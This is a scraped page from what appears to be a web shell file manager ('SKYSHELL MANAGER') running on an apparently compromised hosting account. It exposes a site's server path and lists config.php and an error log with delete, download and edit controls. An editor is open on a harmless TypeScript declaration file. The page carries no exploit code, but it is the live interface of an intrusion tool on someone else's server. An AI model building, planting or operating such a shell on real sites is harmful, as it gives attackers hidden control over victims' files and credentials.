📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
12295.21 KB
0644
🗑️
⬇️
✏️
🔒
Editing: index.d.ts
declare namespace getSideChannelWeakMap { type Channel<K, V> = { assert: (key: K) => void; has: (key: K) => boolean; get: (key: K) => V | undefined; set: (key: K, value: V) => void; delete: (key: K) => boolean; } } declare function getSideChannelWeakMap<K, V>(): getSideChannelWeakMap.Channel<K, V>; declare const x: false | typeof getSideChannelWeakMap; export = x;
💾 Save Changes